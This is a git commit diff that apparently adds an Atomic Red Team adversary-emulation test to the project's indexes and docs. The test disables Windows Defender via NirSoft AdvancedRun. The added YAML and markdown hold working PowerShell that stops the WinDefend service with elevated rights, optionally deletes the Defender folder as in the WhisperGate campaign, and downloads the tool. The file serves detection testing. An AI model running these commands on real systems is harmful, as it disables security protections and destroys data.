Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

2022-04-05 15:59:36 +00:00
parent d758660559
commit 66f6f4d8b2
6 changed files with 108 additions and 0 deletions
@@ -408,6 +408,7 @@ defense-evasion,T1562.001,Disable or Modify Tools,25,office-365-Disable-AntiPhis
 defense-evasion,T1562.001,Disable or Modify Tools,26,Disable Windows Defender with DISM,871438ac-7d6e-432a-b27d-3e7db69faf58,command_prompt
 defense-evasion,T1562.001,Disable or Modify Tools,27,Disable Defender with Defender Control,178136d8-2778-4d7a-81f3-d517053a4fd6,powershell
 defense-evasion,T1562.001,Disable or Modify Tools,28,Disable Windows Defender Tamper Protection,5fde6578-9419-46ef-9258-269dc8656c3e,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,29,Disable Defender Using NirSoft AdvancedRun,81ce22fd-9612-4154-918e-8a1f285d214d,powershell
 defense-evasion,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
 defense-evasion,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
 defense-evasion,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
@@ -269,6 +269,7 @@ defense-evasion,T1562.001,Disable or Modify Tools,24,Tamper with Windows Defende
 defense-evasion,T1562.001,Disable or Modify Tools,26,Disable Windows Defender with DISM,871438ac-7d6e-432a-b27d-3e7db69faf58,command_prompt
 defense-evasion,T1562.001,Disable or Modify Tools,27,Disable Defender with Defender Control,178136d8-2778-4d7a-81f3-d517053a4fd6,powershell
 defense-evasion,T1562.001,Disable or Modify Tools,28,Disable Windows Defender Tamper Protection,5fde6578-9419-46ef-9258-269dc8656c3e,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,29,Disable Defender Using NirSoft AdvancedRun,81ce22fd-9612-4154-918e-8a1f285d214d,powershell
 defense-evasion,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
 defense-evasion,T1070.004,File Deletion,4,Delete a single file - Windows cmd,861ea0b4-708a-4d17-848d-186c9c7f17e3,command_prompt
 defense-evasion,T1070.004,File Deletion,5,Delete an entire folder - Windows cmd,ded937c4-2add-42f7-9c2c-c742b7a98698,command_prompt
@@ -640,6 +640,7 @@
  - Atomic Test #26: Disable Windows Defender with DISM [windows]
  - Atomic Test #27: Disable Defender with Defender Control [windows]
  - Atomic Test #28: Disable Windows Defender Tamper Protection [windows]
+  - Atomic Test #29: Disable Defender Using NirSoft AdvancedRun [windows]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -445,6 +445,7 @@
  - Atomic Test #26: Disable Windows Defender with DISM [windows]
  - Atomic Test #27: Disable Defender with Defender Control [windows]
  - Atomic Test #28: Disable Windows Defender Tamper Protection [windows]
+  - Atomic Test #29: Disable Defender Using NirSoft AdvancedRun [windows]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -27089,6 +27089,50 @@ defense-evasion:
        cleanup_command: Set-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows
          Defender\Feature' -name 'TamperData' -value 1
        name: powershell
+    - name: Disable Defender Using NirSoft AdvancedRun
+      auto_generated_guid: 81ce22fd-9612-4154-918e-8a1f285d214d
+      description: "Information on NirSoft AdvancedRun and its creators found here:
+        http://www.nirsoft.net/utils/advanced_run.html\nThis Atomic will run AdvancedRun.exe
+        with similar behavior identified during the WhisperGate campaign.\nSee https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3\nUpon
+        successful execution, AdvancedRun.exe will attempt to run and stop Defender,
+        and optionally attempt to delete the Defender folder on disk. \n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        AdvancedRun_Location:
+          description: Path of Advanced Run executable
+          type: Path
+          default: "$env:temp\\AdvancedRun.exe"
+        delete_defender_folder:
+          description: Set to 1 to also delete the Windows Defender folder
+          type: Integer
+          default: 0
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Advancedrun.exe must exist at #{AdvancedRun_Location}
+
+'
+        prereq_command: 'if(Test-Path -Path #{AdvancedRun_Location}) {exit 0} else
+          {exit 1}
+
+'
+        get_prereq_command: |
+          Invoke-WebRequest "http://www.nirsoft.net/utils/advancedrun.zip" -OutFile "$env:temp\advancedrun.zip"
+          Expand-Archive -path "$env:temp\advancedrun.zip" -destinationpath "$env:temp\" -Force
+      executor:
+        command: |
+          Try {cmd /c #{AdvancedRun_Location} /EXEFilename "$env:systemroot\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run} Catch{}
+          if(#{delete_defender_folder}){
+            $CommandToRun = rmdir "$env:programdata\Microsoft\Windows Defender" -Recurse
+            Try {cmd /c #{AdvancedRun_Location} /EXEFilename "$env:systemroot\System32\WindowsPowershell\v1.0\powershell.exe" /WindowState 0 /CommandLine "$CommandToRun" /StartDirectory "" /RunAs 8 /Run} Catch{}
+          }
+        cleanup_command: 'Try {cmd /c #{AdvancedRun_Location} /EXEFilename "$env:systemroot\System32\sc.exe"
+          /WindowState 0 /CommandLine "start WinDefend" /StartDirectory "" /RunAs
+          8 /Run} Catch{}
+
+'
+        name: powershell
+        elevation_required: true
  T1078.002:
    technique:
      object_marking_refs:
@@ -62,6 +62,8 @@ Adversaries may also tamper with artifacts deployed and utilized by security too

 - [Atomic Test #28 - Disable Windows Defender Tamper Protection](#atomic-test-28---disable-windows-defender-tamper-protection)

+- [Atomic Test #29 - Disable Defender Using NirSoft AdvancedRun](#atomic-test-29---disable-defender-using-nirsoft-advancedrun)
+

 <br/>

@@ -1186,4 +1188,62 @@ Set-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft



+<br/>
+<br/>
+
+## Atomic Test #29 - Disable Defender Using NirSoft AdvancedRun
+Information on NirSoft AdvancedRun and its creators found here: http://www.nirsoft.net/utils/advanced_run.html
+This Atomic will run AdvancedRun.exe with similar behavior identified during the WhisperGate campaign.
+See https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3
+Upon successful execution, AdvancedRun.exe will attempt to run and stop Defender, and optionally attempt to delete the Defender folder on disk.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 81ce22fd-9612-4154-918e-8a1f285d214d
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| AdvancedRun_Location | Path of Advanced Run executable | Path | $env:temp&#92;AdvancedRun.exe|
+| delete_defender_folder | Set to 1 to also delete the Windows Defender folder | Integer | 0|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+Try {cmd /c #{AdvancedRun_Location} /EXEFilename "$env:systemroot\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run} Catch{}
+if(#{delete_defender_folder}){
+  $CommandToRun = rmdir "$env:programdata\Microsoft\Windows Defender" -Recurse
+  Try {cmd /c #{AdvancedRun_Location} /EXEFilename "$env:systemroot\System32\WindowsPowershell\v1.0\powershell.exe" /WindowState 0 /CommandLine "$CommandToRun" /StartDirectory "" /RunAs 8 /Run} Catch{}
+}
+```
+
+#### Cleanup Commands:
+```powershell
+Try {cmd /c #{AdvancedRun_Location} /EXEFilename "$env:systemroot\System32\sc.exe" /WindowState 0 /CommandLine "start WinDefend" /StartDirectory "" /RunAs 8 /Run} Catch{}
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Advancedrun.exe must exist at #{AdvancedRun_Location}
+##### Check Prereq Commands:
+```powershell
+if(Test-Path -Path #{AdvancedRun_Location}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "http://www.nirsoft.net/utils/advancedrun.zip" -OutFile "$env:temp\advancedrun.zip"
+Expand-Archive -path "$env:temp\advancedrun.zip" -destinationpath "$env:temp\" -Force
+```
+
+
+
+
 <br/>